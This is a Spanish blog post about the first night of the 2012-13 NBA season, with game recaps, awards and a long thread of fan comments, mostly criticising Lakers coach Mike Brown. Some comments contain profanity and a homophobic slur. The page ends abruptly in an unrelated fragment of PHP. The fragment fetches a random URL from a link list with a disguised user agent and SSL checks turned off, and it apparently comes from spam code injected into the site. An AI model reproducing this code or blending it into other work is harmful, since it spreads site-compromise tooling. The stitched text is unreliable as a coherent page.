La Crónica: Empieza la temporada 2012/2013

31 de October de 2012 por TheDeerHunter

Ya estamos ahí, señores. Comienza oficialmente la temporada 2012-13.

Podríamos abrir con aquello de que todo ha empezado como terminó la pasada campaña, victoria de Miami y… decepción de Lakers, pero técnicamente no fue así.

El curso empezaba cronológicamente en el Quicken Loans Arena de Cleveland. Los Cavs se hicieron el bocadillo con unos Wizards terriblemente insustanciales. Importante roto el que les causaron por un lado Kyrie Irving aprovechando la baja de Wall, y por el otro Varejao reencarnado en el mismísimo Russell con 23 rebotes sin despeinarse (o mejor dicho bien despeinado) y rozando el triple doble. Además Dion Waiters dobletó a Beal, en el primer duelo interesante de rookies. Es obvio que los Wizards lo van a pasar mal hasta la vuelta de Wall pero el calvario puede ser de época con la capacidad que mostraron anoche en el rebote defensivo. Booker + Okafor = 2 RD. Las imágenes del partido pueden herir la sensibilidad ante tal violación bajo tableros (84-94). 

Después asistímos a la ceremonia de entrega de anillos en Miami y también al morbo que suponía el primer enfrentamiento de Ray Allen contra sus excompañeros. Si está todo el curso como le vimos anoche el resto de la liga se puede preparar. Extraordinario, como también lo estuvo el “fundamental three” de Miami, con Wade especialmente brillante. Parece que Spoelstra se ha decidido definitivamente por explotar el “small ball” con LeBron de 4. Los Celtics, no obstante, cuajaron un partido digno asumiendo un ataque rival casi imparable. Costatamos que ni Courtney Lee, ni Terry son Ray Allen… pero por lo demás el equipo hueso de siempre con una más que meritoria aportación de Leandrinho (107-120).

Para terminar, en el Staples, uno esperaba ansioso el malsano duelo entre Supermán y Eddy Curry aunque al final Dallas alineaba la pareja Brand-Brandan Wright. Pésimo debut de los estelares refuerzos. Nash estuvo mal y Howard firmó un sonrojante 3 de 14 en tiros libres y terminó expulsado por faltas. Por ahí se escapó buena parte del partido, añadiendo una defensa inexistente y una aportación del banco en el mejor de los casos discreta. Pau Gasol fue el mejor de largo y Kobe Bryant al 85% mejor que la inmensa mayoría.
Por su parte los Mavs se mostraron tremendamente prácticos e inteligentes, con un trabajo colectivo excelente. 6 hombres en dobles figuras y todo dios remando. Admirable (99-91).

PREMIOS

MVP: 4 candidatos al premio: Lebron, Wade, Irving y Varejao. “The King” nos regaló una de esas actuaciones totales a las que nos tiene acostumbrados con 26 puntos, 10 rebotes y 3 asistencias, bien escoltado por Wade que sumó otros 29 puntitos. Pero nos vamos a quedar con un ganador de los Cavaliers. Casi imposible para mí decidir entre el casi triple doble de Anderson Varejao con sus 23 rebotes, 9 puntos y 9 asistencias y los 29 puntos, 6 asistencias y 3 rebotes de Kyrie Irving. Como al jugador de segundo año le veremos más por estos lares, nos quedamos con el brasileño. Premio para él.

Rookie: Inauguramos la carrera por el ROY con Dion Waiters añadiéndose a la fiesta con 17 puntitos. Poca resistencia del resto de rookies, donde Bradley Beal defraudó un poco  y Jared Sullinger naufragó en su debut oficial con los Celtics.

Sorpresa: ¡¡23 rebotes!! Poco más que decir. Las ganas con las que Ray Allen machacó a sus excompañeros no creo que fueran sorpresa para nadie.

Decepción: Steve Nash fue uno de los movimientos del verano, pero si no quiere que el público del Staples empiece a cuchichear deberá hacerlo mucho mejor. Lo de Howard y los tiros libres también es para hacérselo mirar.

Esfuerzo en vano: Rajon Rondo y Paul Pierce hicieron todo lo que estuvo en su mano, pero fue materialmente imposible. Pero el premio se lo vamos a dar esta vez a Pau Gasol. El español cuajó un buen debut y se acercó al triple doble una vez más con 23 puntos, 13 reobtes y 6 asistencias a los que añadió 3 tapones. Fue el mejor de su equipo en todas las categorías estadísticas.

Imágenes | AP Photos / Getty Images

Comenta

39 comentarios a esta entrada

  1. Denise dice:
    #1

    Sobre el BOS-MIA, esperaba mas de Sulinger a raiz de los comentarios aquí de la gente, pero bueno, la temporada es larga y solo es su primer partido como profesional.
    Sigo pensando que los Celtics tienen un gran banquillo, aunque ayer solo Barbosa se salvó, Terry y Green nefastos, y no sé si Milicic está lesionado, pero me sorprendió que no jugara nada.
    Los Heat, una gran apisonadora, con Allen y Lewis masacrando desde el banquillo, Lo de Lebron de 4 y Bosh de 5, me convence para ratos cortos como finales de partidos, apretados, no para tantos minutos, pero ya se verá cuanto juegan cada uno ahí.

    Sobre el LAL-Dal, pesimo partido de Lakers; unos Mavs bastante mansos sin ninguna referencia en la pintura se han cargado a los todopoderosos. Seguro que al banquillo le van a caer palos, pero yo no creo que los Meeks, Jamison, Hill y Cia lo hiciesen tan mal. Simplemente, hay que buscarlos un poco más o combinarlos mas tiempo con los titulares.
    Y mucho hablar del rol de Gasol, que iba a disminuir, y ha sido el que mas lanzó, y en definitiva el mejor del equipo; aunque defensivamente estuvo bastante blando con mediocres como Wright o Curry. A Howard veo que le dan palos por los tiros libres, pero es normal, es Howard, cierto que tiene que mejorar, pero si repasa su carrera, ha hecho un monton de series libres así; no es nada sorprendente.

    Y sobre el Was-Cle, los Wizards estaban muy condicionados por las bajas de Nene y Wall. No creo que entren en PO, pero haran un buen año. Y confio mucho en Vesely, creo que optará al MIP.

      Citar

  2. Lanegan dice:
    #2

    Al banquillo de LAL le van a caer muchos palos, pero en dirección a Mike Brown. Habrá que darles un tiempo de confianza al tener piezas nuevas y un nuevo sistema ofensivo, pero lo que vi ayer pintaba muy mal. A bote pronto este sistema no parece nada bueno para aprovechar a Nash en ataque, Kobe tendrá que cederle protagonismo en los ataques si quieren Steve pueda explotar sus grandes cualidades. En defensa lo esperado, un coladero ante un base rápido y con desborde (y de esos hay muchos en la liga). Ahí Brown tendrá que organizar un buen sistema de ayudas para frenar la sangría. MWP por lo de ahora desaparecido en combate. Y la dupla Gasol-Howard hizo buenos números pero ante una zona como la que presentaba Dallas debería haber sido absolutamente dominante y determinante (otro fallo en la organización del ataque de Brown?). A ver como evolucionan….

      Citar

  3. nba dice:
    #3

    Irving va a marca epoca …, que magia tiene el chaval , a ver que tal lo hace Lillard.
    Respecto a Lakers, aunque suene una ofensa yo sigo viendo que Pau deberia salir con los del banquillo en buenos tramos del partido , para poder equilibrar los quintetos y que el se sienta el referente en ataque para que los suplentes a su alrededor no se sientan presionados por la necesidad imperiosa de anotar.
    Me entran las dudas de si con un base como CP3 las cosas funcionarian mejor, porque si un tio tan inteligente como Nash ofrece ese rendimiento aunque sea en un primer partido, me da a mi que el problema no va a estar en los que saltan a cancha.
    Ultimo apunte, ayer al menos Sacre deberia haber jugado 10-15 minutos, que no es tan malo

      Citar

  4. Laker1624 dice:
    #4

    Buenas

    Creo que el partido que se han marcado los Heat ha sido el debut ideal, sobretodo en lo que se refiere a Rashard Lewis, que me ha dejado muy buenas sensaciones, lo de Allen supongo que era de esperar. Si Miami rinde a este nivel regularmente dudo que algun equipo pueda hacerle sombra, ya que en mi opinion los Celtics han jugado un gran partido pero aun asi no han tenido oportunidad, lo que dice mucho a favor de Miami.

    En cuanto a los Lakers supongo que habra que esperar, pienso que hoy han caido ante un equipo que ha hecho un gran trabajo en conjunto sin hacer nada del otro mundo, pero que al fin y al cabo han jugado como un verdadero equipo y eso les ha servido para imponerse ante un rival que por ahora solo son grandes nombres.
    Por destacar algo de LA me quedo con el gran partido de Pau y tambien creo que Kobe ha hecho un buen partido, sobretodo despues de ver sus porcentajes de tiro.

    Por parte de los Cavs me ha impresionado el partido de currante que se ha marcado Varejao. Aunque sigo sin tener muchas esperanzas puestas en este equipo a pesar de Irving. Cuando regrese Wall supongo que podremos ver el nivel real de estos Wizards, por que el partido que se han marcado hoy me ha parecido muy flojo.

      Citar

  5. Esteban dice:
    #5

    es dificil criticar el equipo armado por los lakers, sencillamente es de otro planeta

    pero necesitaban un alero que pudiera meter triples, y un sexto hombre revulsivo, capaz de anotar cuando el ataque esta estancado

    dependen demasiado de su BIG 4, y cuando ellos 4 no fucnionan tienen poco mas para salir a flote

      Citar

  6. Denise dice:
    #6

    Esteban:
    es dificil criticar el equipo armado por los lakers, sencillamente es de otro planeta

    pero necesitaban un alero que pudiera meter triples, y un sexto hombre revulsivo,capaz de anotar cuando el ataque esta estancado

    dependen demasiado de su BIG 4, y cuando ellos 4 no fucnionan tienen poco mas para salir a flote

    Ya, pero si un equipo con Nash, Kobe, Gasol y Howard necesita que un tio salga desde el banquillo a anotar porque ellos no pueden….mal vamos. Un equipo con estos 4 tios nunca debe quedarse estancado en anotación. Otra cosa es que le ganen a mas de 110 puntos porque no defiendan un pimiento, pero deberian irse cada noche a 105 puntos como mínimo.

      Citar

  7. Esteban dice:
    #7

    creo q jamison deberia probar como alero titular, y aprovechar los espacios que le generaran los 4 grandes, lo de metta mejor olvidarnos

      Citar

  8. jose antonio ramirez dice:
    #8

    Vergonzoso debut de los lakers, vaya panda amigos, esto no es que necesite mucho tiempo para cuajar, esque dudo que les de tiempo visto lo de ayer. No me esperaba ese debut tan feo, quien haya visto el partido sabra de lo que estoy diciendo. Muy buenas sensaciones con miami, inmejorables, creo que el record de los bulls puede etar en peligro, no es coña. Pocas veces se ha visto un dominio asi en la nba en muchos años, a pesar del partido mas que digno de los celtics, que necesitan todavia muchos acoples y encajes pero en general me gustaron, lucharon hasta el final y es de esperar que vayan a mas

      Citar

  9. nba dice:
    #9

    Respecto al partido de Lakers, si no me falla la memoria y teniendo en cuenta los partidos de la temporada pasada y de esta pretemporada, me parece que ya acumulan un bonito 0-11, que eso, sin menospreciar a los Bobcats, aun se podría entender, pero leches que son los Lakers y que tienes a gente en la plantilla que son autenticas figuras en la liga, como pierdan contra Clippers, Brown a la calle, y todo esto con un Staples a rebosar
    Que Pau salga desde el banquillo , para que Jamison pueda jugar de 4 titular que es donde se puede sentir mas comodo, en vez de a estas alturas de su carrera ocupar un lugar que deberia ser cubierto por Clark o Ebanks no tiene sentido

      Citar

  10. HisRoyalAirness dice:
    #10

    Vamos a ver, los Lakers empezaron jugando MUY BIEN al baloncesto pero Mr. Potato es deficiente y no se da cuenta de que tiene en el equipo a Steve Nash. Nash tiene que mandar, y punto. No se le puede infrautilizar como se hizo ayer porque entonces es uno más. Tiene que actuar de base, no subir la bola, dársela a Pau y meter el corte.
    Repito, todo culpa de Brown, que con tanta mariconez de la “princeton offense” convierte a Nash en un vulgar base del montón

      Citar

  11. HisRoyalAirness dice:
    #11

    nba:
    Respecto al partido de Lakers, si no me falla la memoria y teniendo en cuenta los partidos de la temporada pasada y de esta pretemporada, me parece que ya acumulan un bonito 0-11, que eso, sin menospreciar a los Bobcats, aun se podría entender, pero leches que son los Lakers y que tienes a gente en la plantilla que son autenticas figuras en la liga, como pierdan contra Clippers, Brown a la calle, y todo esto con un Staplesa rebosar
    Que Pau salga desde el banquillo , para que Jamison pueda jugar de 4 titular que es donde se puede sentir mas comodo, en vez de a estas alturas de su carrera ocupar un lugar que deberia ser cubierto por Clark o Ebanks no tiene sentido

    Eh… Pau desde el banquillo? Viste el partido?

      Citar

  12. nba dice:
    #12

    Royal que no digo que Pau lo hiciese mal, pero como Brown sigue empeñado en que reviente al menos si sale desde el banquillo tendra mas fuelle para defender y ayudara a los suplentes a tener una referencia en ataque, y de todas todas, los suplentes tienen que jugar mas , que no estaban ni Kaman ni Dirk.

      Citar

  13. M dice:
    #13

    Los Lakers es como si a un grupo de superhombres les ponen de jefe a moriarty..pues eso, que usan su talento para EL MAL. Madre mía…

      Citar

  14. Esteban dice:
    #14

    estamos perdiendo de vista que los LAKERS van 0-8?

      Citar

  15. Esteban dice:
    #15

    lo de PAU del banco a mi tampoco me desagrada, culpa del esquema de BROWN, pau debe jugar de 4 abierto al poste alto, si saliera del banco con la segunda unidad jugaria de LO QUE QUISIERA, cerca lejos o desde su casa, a un jugador como el hay que darle libertad

    no es verguenza salir de 6to hombre, sino grandeza, manu ginobili era uno de los 3 o 4 mejores escoltas de la liga y salia del banco, y rotaba años de all-star con años de mejor sexto hombre

    pau podria entrar por Howard y jugar cerca del canasto

    sea pau o quien sea, algo deben hacer los lakers con su banco, no es malo, pero es un banco incapaz de destrabar nada, demasiado jugadores de rol

      Citar

  16. rumbero dice:
    #16

    HisRoyalAirness:
    Vamos a ver, los Lakers empezaron jugando MUY BIEN al baloncesto pero Mr. Potato es deficiente y no se da cuenta de que tiene en el equipo a Steve Nash. Nash tiene que mandar, y punto. No se le puede infrautilizar como se hizo ayer porque entonces es uno más. Tiene que actuar de base, no subir la bola, dársela a Pau y meter el corte.
    Repito, todo culpa de Brown, que con tanta mariconez de la “princeton offense” convierte a Nash en un vulgar base del montón

    Iba a escribir sobre Nash ya que me he tenido que poner el partido para entender pq había dado 4 asistencias en 34 minutos, pero con esto ya está todo dicho. Vale que es el 1r partido, pero como fan de este señor a mi que me expliquen para que lo traes si no vas a darle la batuta y que encima se le vean las carencias defensivas…
    Muy bien los Mavs jugando como equipo y teniendo claro que hacer. A Crowder hay que verle más pq con lo abajo que lo cogieron en el draft puede ser un buen “robo”

      Citar

  17. simon dice:
    #17

    Ayer ya me quedo claro q Brown va a ser capaz de destrozar este equipo… Tal y como utiliza a Nash es mejot sntarlo. Con ese sistema Nash es un jugador muy muy por debajp de la meia. Pue no puede dirigir ni dostribuir ni marcar diferencias. Y si a eso le sumoamos q no defiende el sistema convierte a Nash en nada.

      Citar

  18. elreylagarto dice:
    #18

    Yo sólo digo que NO se entiende como un tío de la capacidad y visión de Kupchapt o como se escriba puede dejar a un SUJETO como Mr. Potato en el banquillo a comienzo de la temporada 2012-2013. Pero si cualquier entrenador de mitad de la ACB hacia abajo le da mil vueltas a ese “accidente”. Por cierto que Mr. Potato venga a Lakers justamente después de un entrenador como el tito Phil ES DE TRACA.

    Hay que joderse…

      Citar

  19. Sancho88 dice:
    #19

    Yo lo dije en el análisis, estos Lakers serán lo que quieran Nash y Kobe, y que el señor ese se quede llenando de mierda su vasito de los cojones. No vale para otra cosa. La pricenton offense esa es para equipos mediocres, no para un equipo comandado por STEVE NASH Y KOBE BRYANT, no me jodas…

      Citar

  20. HisRoyalAirness dice:
    #20

    Vamos a ver, Pau cobra 18 millones, en la NBA es inadmisible que con ese sueldo alguien no sea de partida. Ayer jugó muy bien y se entiende muy bien con todos los titulares, para mí no hay debate respecto a su titularidad.
    Vi a Jamison muy intenso, mucho más de lo que me esperaba y creo que puede ser un 6º hombre muy, muy bueno.

    El cretino de Brown ha querido implementar la Princeton para darle un toque “personal” y que no se le diga que gana por el equipo que tiene. Bien, la Princeton hace que Nash no sirva para nada.
    En el primer tiempo no vi ni un pick&roll y teniendo en cuenta que tienes al base y al pivot que más puntos sacan por esta jugada y no la juegas es que eres imbécil, no hay más.
    Ayer los veías bailando, haciendo cortes y Reggie Miller excitadísimo diciendo “es que mira cuantas posibilidades les da esta táctica” para que luego la primera jugada del partido fuese (y lo juro, a los hechos me remito) UN ACLARADO A METTA WORLD WAR. Estuve a punto de apagarlo

      Citar

  21. nba dice:
    #21

    De acuerdo contigo Royal en lo de Pau, la unica solucion que veo es, que baje Jabbar y le de una colleja a Brown y le diga, deja a Nash-Bryant y Gasol organizar las jugadas y tu ahi calladito …

      Citar

  22. Laker1624 dice:
    #22

    En caso de que Mike Brown fuera destituido
    ¿Quien creeis que seria el mejor situado para ocupar el banquillo laker?
    ¿O quien creeis que seria el entrenador idoneo?
    Supongo que uno de los primeros nombres que viene a la cabeza y que mas ilusiona seria el de Phil Jackson, aunque no se yo si esta por la labor…

      Citar

  23. HisRoyalAirness dice:
    #23

    Sloan

      Citar

  24. charlestone dice:
    #24

    Sloan…sí o sí.

      Citar

  25. Esteban dice:
    #25

    Q vuelva phil !!!

      Citar

  26. gabrielj dice:
    #26

    fichas a Nash y lo haces jugar como si fuera Steve Blake, subiendo la bola y pasando cortes para tirar triples solo, al que se le ocurrió la idea ha debido de quedarse calvo o ya lo estaba de antes y no miro a nadie

      Citar

  27. Denise dice:
    #27

    Laker1624:
    En caso de que Mike Brown fuera destituido
    ¿Quien creeis que seria el mejor situado para ocupar el banquillo laker?
    ¿O quien creeis que seria el entrenador idoneo?
    Supongo que uno de los primeros nombres que viene a la cabeza y que mas ilusiona seria el de Phil Jackson, aunque no se yo si esta por la labor…

    Otros nombres a parte de Jackson y Sloan, serían Eddie Jordan, Nate McMillan, Stan Van Gundy (aunque dudo que vuelva a encontrarse con DH12), Mo Cheeks, Flip Saunders o Mike D’Anthony.

      Citar

  28. Esteban dice:
    #28

    Nunca imagine a nash jugando junto a kobe, y con un alero con metta, es un complicacion, le paso a payton en su momento con kobe y george
    Demasiado base para un equipo q no juega para el

    Por mas q brown quiera nash no puede amasar la bola 15 segunda y kobe esperar abierto un tiro o metta meterlo, ademas de ser un equipo lentisimo en transicion

    Hay muchas piezas q acomodar, no es facil, nash y kobe son jugadores poco compatibles

      Citar

  29. Esteban dice:
    #29

    Denise te olvidas de jeff van gundy

      Citar

  30. Sancho88 dice:
    #30

    Don Nelson

      Citar

  31. rojorob dice:
    #31

    Suena Lotina.

      Citar

  32. Santi dice:
    #32

    rojorob:
    Suena Lotina.

    jarlll

      Citar

  33. nba dice:
    #33

    Me pido primero para recibir el “poster” , de los muchos que les va a hacer a Gasol y compañia,
    Griffin, es que reviviendo alguna de las imagenes de la pasada temporada no puedo dejar de reirme

      Citar

  34. HisRoyalAirness dice:
    #34

    rojorob:
    Suena Lotina.

    No me lo nombres que soy coruñés mecagoenmiputavida

      Citar

  35. Denise dice:
    #35

    rojorob:
    Suena Lotina.

    No sería mala opción. Al menos, en la NBA no hay descensos..xD

    El Knicks-Nets suspendido por el Sandy.

      Citar

  36. Denise dice:
    #36

    LLevamos 8 minutos del Indiana-Toronto y parece como si Hibbert y Valanciunas hubiesen hablado antes del partido para no defenderse y hacer estadísticas. A este paso, acaban con 20-15 al final del partido….

      Citar

  37. Esteban dice:
    #37

    Nacen mega estrellas

    Bienvenido davis a la NBA, nisiquiera fue un partido genial para el, y se va hasta los 21 puntos y 7 rebotes y ni una perdida, exelentisimo desde la linea y la larga distancia, cuando aprenda uno o dos movimientos bajo el aro sera legendario,

    Lowry aprovechando su nuevo rol y nuevo equipo, 21 puntos y 8 asistencias, quiere all star este mismo año

    Bienvenido al mejor quinteto de la nba james harden? 37 puntos, 12 asistencias y 5 rebotes para la victoria de su equipo, y pensar q se criticaba al thunder por tomarlo antes q a evans, madre, los rockets deben estar que flipan, un debut soñado, cuantos dias entreno con sus compañeros, alma de lider y madera de crack

      Citar

  38. Ruxixón dice:
    #38

    El debut de Harden ha sido brutal,vaya números.Ahora mismo,pensando a largo plazo,me sobran esos mastodónticos terceros años de contrato de Asik y Lin.Y para debuts los de Lillard y Anthony Davis señores.El primero frente al jueguete roto de los Lakers y el segundo contra el mejor 4 de la Historia,Timmy.

    Por cierto,¿a alguien más le parece una locura que deRozan vaya a cobrar 40 millones en 4 años?A un servidor le parece un auténtico despropósito tales cantidades,qué ha hecho DeRozan para ganarse 10 millones anuales…están locos!!!

      Citar

  39. nba dice:
    #39

    Y Brown que se prepare las maletas porque como pierdan contra Clippers yo creo que lo echan, pero alguien defiende en este equipo??, que como sigan jugando tantos minutos los titulares necesitaran la bombona de oxigeno en enero.
    Vaya vaya con Houston parece que empiezan con buen pie, Harden ha podido tirarse todas las mandarinas que en Thunder no podia, con un poco mas de aportacion de los interiores van a luchar por intentar conseguir la ultima plaza de playoffs.
    Los Blazzers muy buen juego con mi preferido al ROY demostrando de que pasta esta hecho

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>